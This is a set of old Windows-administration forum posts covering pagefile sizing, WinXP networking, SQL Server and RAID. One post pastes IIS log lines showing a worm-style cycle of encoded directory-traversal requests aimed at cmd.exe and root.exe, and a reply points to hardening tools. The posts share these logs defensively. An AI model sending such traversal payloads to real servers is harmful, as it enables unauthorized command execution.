    Pagefile Settings

It will lock the pagefile and not expand it once the size is set. I have seen it NT boxes cap out when running that same CAD/FEA combo at work run out of memory with 128MB RAM and 200MB pagefile (this was during the demo phase of the software, and the workstations now have 384MB RAM and 200MB swap files with no issues). As for the space consideration, I just don't care for throwing away the space. The smallest drive I use is a 25GB in my workstations, but I still don't care to waste space on something that isn't needed (much in the same way you recommend disabling services that you feel aren't necessary, to keep from throwing RAM away).

    Pagefile Settings

Oh, when I stated the size as being 100-150, I meant using a static file size where the min and max are the same, but set to a value of 100 or 150MB. I didn't realize that it could be viewed as a variable size setting until just now. While I run large apps as well (CAD, FEA, and development crap), I have yet to run out of memory using 150 for the pagefile on systems with 256MB RAM, let alone the 512 I have now. I would just rather not have the system think there's a ton of pagefile space to write to, and I don't want to waste the disk space on anything larger.

If you have issues with one another, then take it to email but not this board.
  4. Enough, this is an old (and now dead) thread.

When are you switching to WinXP?

Except nothing runs on it. Not to mention that with it (d)evolving into a more "Windows" like interface, it will wind up having most of its instabilities and bloated size as well. I do like the ability to completely customize it, but it isn't worth dealing with until REAL replacements for apps (not that StarOffice POS, or Nutscrape) that run in Windows come out. Does anybody have a good recommendation for an office suite in Linux? I am also waiting for major apps like Flash and Photoshop to make it to Linux, otherwise I will just have an OS and nothing to really use on it. I know that there are a good deal of freebie apps that are available, but I still want the ones that I am familiar with. Changing OS is bad enough, but having to find equivalent apps to replace the ones that I already use (and have licenses for) it just too much at this time. While WinXP is "handy" with some of its utilities, I find it to be a disappointment because it is such a pig. However, it's definately a major step forward from Win9X.

    horrible low network utilization

From what I have played with in WinXP, they are one and the same. It seems to be borrowing from some of the Network Monitor 2 code that comes from SMS 2.0 drivers. The best thing that I can suggest (and do if I see the same situation) is use a network sniffer and see what that machine is doing when there is a slow download condition. In regards to network util on my test XP box, it performs as expected. With normal traffic, it runs at 0.5%-2% utilization while copying a large file (Vis Studio SP5) from a server sitting on the same 10Mb hub will cause it to run between 70%-75%. Now, with respect to your comparing your workstation to others on your network, are they running the same hardware? Can they connect to your port and still maintain the same level of performance? Have you tried other drivers/NICs (besides those listed, like an Intel or 3Com)?

You don't need to tweak WinXP like that?

Quote: Laugh! well if thats what you do whilst sitting at your computer then good on you. Enjoy yourself. Thats what life is all about, NOT! Funny, I found this to be the first rude post in this thread, and I am not surprised by the response you received. Now, you are encouraging a flame war with your last post. So what is the point of this then? You came in posturing about how everybody is wasting his/her time doing tweaks, when it *could* be simple hardware compatibility. While your post may be correct, your posturing reduced the effectiveness of it. Also, the reference to security policies IS valid since you wrote about the *possible* need to disable a firewall in order to share files (which I haven't seen, since all of my WinXP installs have worked fine with NT4/2K networks). Any alteration of such a device would affect the security of a workstation/server/network. So, how about the next time you want to convey your thoughts to other users of this board, you do so without the mocking behavior. Food for thought.

    horrible low network utilization

Umm, most networks don't break 5% utilization even with > 50 active workstations and several servers. You will see peaks when you are transferring large files, but at times you may still only see 50%-75% even then. As for the slow transfer speed, what method were you using?

Terminal Services And Windows NT 4.0

While Terminal Services was available for NT 4.0, it was a separate distribution of NT 4.0 Server named "NT 4.0, Terminal Server Edition". I am not aware of any way to "bolt-on" the terminal server functionality from that distro to a regular NT 4.0 Server install.

    SQL2000 vs MySQL

Oh, in that case I can say that MS SQL 2000 works rather well. There is a great deal of functionality to it that I haven't touched, but from what I use it has worked very well. Here is a comparison of Enterprise and Standard editions from MS: http://www.microsoft.com/sql/howtobuy/choosing/default.asp also, the Enterprise edition comes with SQL Server Desktop Edition as well. I do like the tools that it comes with (Query Analyzer, and the Enterprise Manager) to manage the servers their respective components. It also interfaces with Office 2000/XP really well, along with Visual Studio/VS.NET. As for MySQL, I only installed it once and never really messed with it, but it seems to be very functional and scalable (this site is running on it right now) and it's free. Maybe someone else can shed some light on this.

    SQL2000 vs MySQL

Seems like a broad question there bud. Well, what are you looking to do with them? What kind of system will be hosting the database? Is cost a consideration? I like MS SQL 2000 a lot, but it can be quite expensive to license depending on the application and the hosting server configuration.

    Resetting the 30 day countdown

Yeah, sorry EM. While I can understand your problem (I feel the same way), I can't really allow for that to be posted here since it could be easily used by peeps to crack not-so-legitimate copies of the OS. I will leave this post here though, in the hopes someone might email the answer to you. Again, sorry about this...

Anthrax Infested Topic....do not open !!!

Just so you guys know, Anthrax is a spore that resides in dirt, and there are cases in cattle areas here in the US (and I imagine all over the world) that don't get recognition as it: A. Is usually very isolated, being in a large ranch, and B. Occurs "regularly" (not like a cold or flu, of course) enough to not attract attention from the hospitals local to those areas. The cases found in urban areas where all this powder is found would be out of the norm (duh ), and is obviously intentional. However, cases that are found in rural areas may be only getting attention due to this scare. Just consider that when you see some of these reports.

Yep. A few different files, but the same OS. The MSDN version may not even prompt for a serial number (as can be setup by modifying a file) either by default, let alone activation.

    Pagefile Settings

As for me, I would probably set it to 100-150 since that is quite a large amount of RAM.

Looks like someone was trying to hack my IIS4

    Cool. I haven't seen entries like that in my event logs (probably due to the lockdown tools), but I do see the attacks via my IIS logs like so: 65.29.76.242 - 10/15/2001 10:49:09 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/root.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /MSADC/root.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /c/winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /d/winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%255c../winnt/system32/cmd.exe?/c+dir - Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir That is one attack cycle, and I track these via an ASP app (which this was copied from) that queries my SQL logs DB. I am up to 900 hits today as of this post since midnight.

Looks like someone was trying to hack my IIS4

While it looks like someone might be trying to get something not normally asked for, I am not familiar with that exploit. If you would like to be rid of the vast majority of crap from these simple but effective attacks, check out this tool: http://support.microsoft.com/support/kb/articles/q307/6/08.asp It's URLScan, and would have dropped those requests immediately if configured to do so (which it would by default, I believe). There is another tool here: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/locktool.asp and while it works well, it broke my use of OWA (Outlook Web Access) and I wound up removing it. It's a bit more powerful, and is based on the idea of how to deal with a situation if you are compromised vs. the other tool which blocks intended compromising attacks. There is also the high security web template, and has worked against Code Red and other attacks as well, but is almost non-existant in the installed base of IIS servers on the 'net. You can find the template here: http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/iis/tips/iis5chk.asp down toward the middle. By the way, that page is also the security checklist for IIS5, and is full of useful information. Hope this helps.

    NT/Win2K Software RAID

If you don't need it, avoid it. It has a good deal more overhead (even when compared to NT 4 software RAID) than hardware RAID or normal disk mounting, and will actually validate the disks in case of a "dirty" shutdown (45 min to an hour in my case). I used to stripe 3 4.3GB IDE drives in NT 4 Server with no issues, but when I went to Win2K server, disk I/O was miserable using software RAID. I just decided to use the disks independently until I could get a larger hard drive.

What were you running before Win2K?

NT4 is much better than Win9X for network administration and the larger programs (Photoshop, Visual Interdev, Solidworks, etc) that I used in development and graphics work. Plus, it had much better memory management for boxes that I used (and still use on our network) when they went over 128MB RAM. But, NT4 is an "accuired taste" for most people.

    Windows XP repeated networking problems!

Sorry bud, WinXP has connected to every network I have put it on (along with some other peeps I have spoken to). These have been full NT/2K domains, with local name resolution abilities (at least WINS, but both WINS/DNS in my case) and there haven't been any issues. I only post this so you can see that someone is, in fact, reading your post.
  24. I just sync one DC to the US Naval Observatory (for our timezone) and have the other DCs sync with that one. Every now and again I check my time, and I am within about .05 seconds (via the java-applet clock that one of their pages shows) of the master time.
